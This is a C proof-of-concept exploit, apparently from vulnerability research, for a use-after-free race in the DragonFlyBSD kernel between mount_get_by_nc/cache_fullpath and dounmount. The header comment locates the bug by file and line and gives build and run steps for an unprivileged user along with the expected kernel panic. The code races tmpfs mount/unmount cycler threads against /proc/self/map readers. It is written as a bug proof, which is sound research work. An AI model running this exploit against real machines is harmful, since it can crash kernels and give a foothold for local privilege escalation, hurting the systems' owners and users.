/*
 * DF-0044 PoC -- mount_get_by_nc unheld-return UAF via cache_fullpath
 *               racing dounmount.
 *
 * CONFIRMED CODE-LEVEL BUG (master DEV, X86_64_GENERIC):
 *   - sys/kern/vfs_mount.c:1235-1248  mount_get_by_nc() returns mp
 *     WITHOUT calling mount_hold(mp).  Token released at :1245, return
 *     at :1247 -- no hold taken.  Contrast vfs_getvfs() at :413-424
 *     which does mount_hold(mp) at :420-421 (comment at :410-411
 *     documents the contract: "the returned mp is held and the caller
 *     is expected to drop it via mount_drop()").  mountlist_scan() at
 *     :756/:784 also mount_hold()s before dropping the token.
 *     mount_get_by_nc is the lone outlier and breaks the invariant.
 *   - sys/kern/vfs_cache.c:5214  sole caller cache_fullpath() takes the
 *     returned mp and at :5224 dereferences new_mp->mnt_ncmounton AFTER
 *     the mountlist_token has been released.  It never mount_drop()s.
 *   - sys/kern/vfs_syscalls.c:1040,1066-1069,1108-1117  dounmount()
 *     removes mp from mountlist, zeroes mnt_ncmounton, waits for
 *     mnt_refs==0, then mount_drop(mp) -> kfree(mp, M_MOUNT) once
 *     mnt_hold hits 0.  That kfree frees the very struct the unheld
 *     pointer in cache_fullpath still points at -> UAF.
 *
 * The ONLY caller of cache_fullpath(guess=1) is procfs_map.c:181
 * (vn_fullpath(p, vp, ..., 1) when reading /proc/$pid/map).  So the
 * deref side must read /proc/$pid/map for a vnode whose path traverses
 * the cycled mountpoint.
 *
 * This PoC drives BOTH sides concurrently.  The binary is placed INSIDE
 * the cycled mount, so its text vp is on the cycled mount.  Reading
 * /proc/self/map then drives vn_fullpath(p, p_textvp, ..., 1) ->
 * cache_fullpath(guess=1) -> mount_get_by_nc.  Meanwhile, N cyclers
 * mount+unmount the path to free struct mount through kfree.
 *
 * Build (DragonFlyBSD, as unpriv user): cc -pthread -O2 -o mount_uaf ...
 * Run  (place binary INSIDE the mountpoint; vfs.usermount=1;
 *      disposable VM): ./mount_uaf /tmp/df0044/m 60
 *
 * NOTE: this race is extremely tight on a non-INVARIANTS kernel.
 * The deref is a single memory read; the unmount's kfree is gated by
 * an mnt_refs drain that usually completes only after the deref.
 * A panic in _cache_hold on a bogus ncp, a slab-allocator complaint,
 * or a fatal trap in vfs_cache.c during the deref window is the
 * expected signature when the race is won.  If the guest stays up,
 * the race was not won this run -- the code-level proof in
 * VERDICT.md stands regardless.
 */

#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mount.h>
#include <sys/stat.h>
#include <sys/types.h>

/* tmpfs mount-info struct (sys/vfs/tmpfs/tmpfs_mount.h).
 * We need to set ta_root_uid = getuid() so the mount is owned by us
 * and we can unmount it without MNT_FORCE (which is privileged).
 * Otherwise tmpfs_statfs overwrites mnt_stat.f_owner with tm_root->tn_uid
 * (default 0 = root), and sys_unmount then denies us with EPERM
 * (mnt_stat.f_owner != our uid && no priv). */
#define TMPFS_ARGS_VERSION 2
struct tmpfs_mount_info {
	int   ta_version;
	long long ta_nodes_max;    /* ino_t */
	long long ta_size_max;     /* off_t */
	unsigned long long ta_maxfsize_max;  /* size_t */
	unsigned int ta_root_uid;  /* uid_t */
	unsigned int ta_root_gid;  /* gid_t */
	unsigned short ta_root_mode; /* mode_t */
};

static char mpoint[512];
static volatile int go = 1;
static volatile unsigned long long iter_deref = 0;
static volatile unsigned long long iter_free  = 0;
static volatile unsigned long long iter_free_fail = 0;

/* Free side: cycle mount+umount of mpoint to recycle struct mount
 * through kfree.  No MNT_FORCE needed (we own the mount). */
static void *
mount_cycler(void *a)
{
	(void)a;
	while (go) {
		struct tmpfs_mount_info mi;
		memset(&mi, 0, sizeof(mi));
		mi.ta_version = TMPFS_ARGS_VERSION;
		mi.ta_root_uid = getuid();
		mi.ta_root_gid = getgid();
		mi.ta_root_mode = 0755;
		int mr = mount("tmpfs", mpoint, 0, &mi);
		if (mr != 0) {
			/* Maybe leftover from a peer thread -- try cleanup. */
			iter_free_fail++;
			unmount(mpoint, 0);
			continue;
		}
		/* Plain unmount: nothing holds vnodes on the fresh tmpfs. */
		int ur = unmount(mpoint, 0);
		if (ur == 0)
			iter_free++;
		else
			iter_free_fail++;
	}
	return NULL;
}

/* Deref side: read /proc/self/map. procfs_map.c:181 calls
 * vn_fullpath(p, vp, ..., 1) for each vnode-backed vmap.  Our text vp
 * (this binary) lives inside mpoint, so its path traverses the cycled
 * mountpoint, exercising cache_fullpath(guess=1) -> mount_get_by_nc. */
static void *
map_reader(void *a)
{
	(void)a;
	char buf[65536];
	while (go) {
		int fd = open("/proc/self/map", O_RDONLY);
		if (fd < 0) { usleep(50); continue; }
		ssize_t n;
		while ((n = read(fd, buf, sizeof(buf))) > 0) {
			iter_deref++;
		}
		close(fd);
	}
	return NULL;
}

int main(int argc, char **argv)
{
	if (argc > 1)
		snprintf(mpoint, sizeof(mpoint), "%s", argv[1]);
	else if (getcwd(mpoint, sizeof(mpoint)) == NULL) {
		perror("getcwd"); return 2;
	}
	unsigned int secs = 30;
	if (argc > 2) secs = (unsigned int)atoi(argv[2]);
	unsigned int nfree = 2;
	if (argc > 3) nfree = (unsigned int)atoi(argv[3]);

	fprintf(stderr, "DF-0044: cycling mount at %s (uid=%u gid=%u)\n",
		mpoint, getuid(), getgid());
	fprintf(stderr, "DF-0044: %u cycler threads + 4 /proc/self/map readers\n",
		nfree);
	fprintf(stderr, "DF-0044: running %u seconds\n", secs);

	pthread_t tfree[16], tderef[4];
	for (unsigned int i = 0; i < nfree && i < 16; i++)
		pthread_create(&tfree[i], NULL, mount_cycler, NULL);
	for (int i = 0; i < 4; i++)
		pthread_create(&tderef[i], NULL, map_reader, NULL);

	sleep(secs);
	go = 0;
	for (unsigned int i = 0; i < nfree && i < 16; i++)
		pthread_join(tfree[i], NULL);
	for (int i = 0; i < 4; i++)
		pthread_join(tderef[i], NULL);

	fprintf(stderr,
		"DF-0044: deref=%llu  free_ok=%llu  free_fail=%llu\n",
		iter_deref, iter_free, iter_free_fail);
	fprintf(stderr, "DF-0044: still alive -- race not won this run\n");
	return 0;
}
